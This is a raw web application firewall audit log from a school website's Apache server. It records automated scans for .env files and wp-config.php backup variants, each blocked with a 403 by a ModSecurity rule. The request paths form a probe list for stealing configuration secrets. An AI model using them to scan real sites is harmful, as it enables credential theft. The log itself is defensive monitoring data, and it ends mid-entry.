HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9667364-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909208349 667 (- - -) Stopwatch2: 1745151909208349 667; combined=248, p1=214, p2=0, p3=0, p4=0, p5=33, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9667364-Z-- --876f4252-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8AAAAEY 103.236.140.4 38500 103.236.140.4 8181 --876f4252-B-- GET /test/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --876f4252-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --876f4252-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909277645 656 (- - -) Stopwatch2: 1745151909277645 656; combined=257, p1=216, p2=0, p3=0, p4=0, p5=40, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --876f4252-Z-- --10392b58-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8QAAAFU 103.236.140.4 38502 103.236.140.4 8181 --10392b58-B-- GET /src/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --10392b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10392b58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909347510 668 (- - -) Stopwatch2: 1745151909347510 668; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10392b58-Z-- --4d46d65f-A-- [20/Apr/2025:19:25:09 +0700] aATnpVu16wJWB6g0mU8NugAAAA8 103.236.140.4 38504 103.236.140.4 8181 --4d46d65f-B-- GET /production/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4d46d65f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d46d65f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909416693 649 (- - -) Stopwatch2: 1745151909416693 649; combined=249, p1=223, p2=0, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d46d65f-Z-- --f3cb5f66-A-- [20/Apr/2025:19:25:09 +0700] aATnpVu16wJWB6g0mU8NuwAAAA0 103.236.140.4 38506 103.236.140.4 8181 --f3cb5f66-B-- GET /new/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --f3cb5f66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3cb5f66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909486363 669 (- - -) Stopwatch2: 1745151909486363 669; combined=275, p1=247, p2=0, p3=0, p4=0, p5=27, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cb5f66-Z-- --5e7ffa2e-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8gAAAEM 103.236.140.4 38508 103.236.140.4 8181 --5e7ffa2e-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --5e7ffa2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e7ffa2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909556321 721 (- - -) Stopwatch2: 1745151909556321 721; combined=303, p1=271, p2=0, p3=0, p4=0, p5=32, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e7ffa2e-Z-- --55e71b60-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8wAAAFE 103.236.140.4 38510 103.236.140.4 8181 --55e71b60-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --55e71b60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55e71b60-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909625392 729 (- - -) Stopwatch2: 1745151909625392 729; combined=277, p1=240, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55e71b60-Z-- --3a279456-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9AAAAEQ 103.236.140.4 38512 103.236.140.4 8181 --3a279456-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3a279456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a279456-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909694755 642 (- - -) Stopwatch2: 1745151909694755 642; combined=252, p1=224, p2=0, p3=0, p4=0, p5=28, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a279456-Z-- --fcd07176-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9QAAAEI 103.236.140.4 38514 103.236.140.4 8181 --fcd07176-B-- GET /wp-config.php.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --fcd07176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcd07176-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909763961 643 (- - -) Stopwatch2: 1745151909763961 643; combined=239, p1=212, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcd07176-Z-- --8c867964-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9gAAAEo 103.236.140.4 38516 103.236.140.4 8181 --8c867964-B-- GET /wp-config.php-backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8c867964-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c867964-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909834061 642 (- - -) Stopwatch2: 1745151909834061 642; combined=261, p1=235, p2=0, p3=0, p4=0, p5=26, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c867964-Z-- --0a32cc26-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9wAAAFM 103.236.140.4 38518 103.236.140.4 8181 --0a32cc26-B-- GET /wp-config.php1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --0a32cc26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a32cc26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909904777 718 (- - -) Stopwatch2: 1745151909904777 718; combined=248, p1=222, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a32cc26-Z-- --4733b275-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ-QAAAEA 103.236.140.4 38524 103.236.140.4 8181 --4733b275-B-- GET /wp-config.php.orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4733b275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4733b275-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909975843 661 (- - -) Stopwatch2: 1745151909975843 661; combined=247, p1=220, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4733b275-Z-- --cb17ad2d-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ-gAAAFg 103.236.140.4 38526 103.236.140.4 8181 --cb17ad2d-B-- GET /wp-config.phpold HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cb17ad2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb17ad2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910053718 630 (- - -) Stopwatch2: 1745151910053718 630; combined=242, p1=215, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb17ad2d-Z-- --7d80ef27-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ-wAAAFQ 103.236.140.4 38528 103.236.140.4 8181 --7d80ef27-B-- GET /.wp-config.php.swp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --7d80ef27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d80ef27-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910123424 628 (- - -) Stopwatch2: 1745151910123424 628; combined=243, p1=216, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d80ef27-Z-- --d468bb40-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_AAAAFA 103.236.140.4 38530 103.236.140.4 8181 --d468bb40-B-- GET /wordpress/wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d468bb40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d468bb40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910192670 648 (- - -) Stopwatch2: 1745151910192670 648; combined=246, p1=216, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d468bb40-Z-- --9a1cc968-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_QAAAFI 103.236.140.4 38532 103.236.140.4 8181 --9a1cc968-B-- GET /wp/wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --9a1cc968-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a1cc968-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910262673 665 (- - -) Stopwatch2: 1745151910262673 665; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a1cc968-Z-- --ad059132-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_gAAAEw 103.236.140.4 38534 103.236.140.4 8181 --ad059132-B-- GET /test/wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --ad059132-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad059132-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910332191 806 (- - -) Stopwatch2: 1745151910332191 806; combined=293, p1=256, p2=0, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad059132-Z-- --a76ceb46-A-- [20/Apr/2025:19:25:10 +0700] aATnplTf0pL9EQC7JDUZ_wAAAE8 103.236.140.4 38536 103.236.140.4 8181 --a76ceb46-B-- GET /blog/wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a76ceb46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a76ceb46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151910402196 714 (- - -) Stopwatch2: 1745151910402196 714; combined=313, p1=281, p2=0, p3=0, p4=0, p5=32, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a76ceb46-Z-- --939f7016-A-- [20/Apr/2025:19:57:07 +0700] aATvI8TCDeBrh52UaHTABAAAAI4 103.236.140.4 45954 103.236.140.4 8181 --939f7016-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.36.26 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.36.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --939f7016-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --939f7016-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745153827634630 710 (- - -) Stopwatch2: 1745153827634630 710; combined=298, p1=255, p2=0, p3=0, p4=0, p5=43, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --939f7016-Z-- --15ea0040-A-- [20/Apr/2025:20:21:56 +0700] aAT09Fu16wJWB6g0mU8RiQAAAA8 103.236.140.4 52220 103.236.140.4 8181 --15ea0040-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; YS900) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Iron Safari/537.36 Accept-Charset: utf-8 --15ea0040-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15ea0040-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745155316875199 757 (- - -) Stopwatch2: 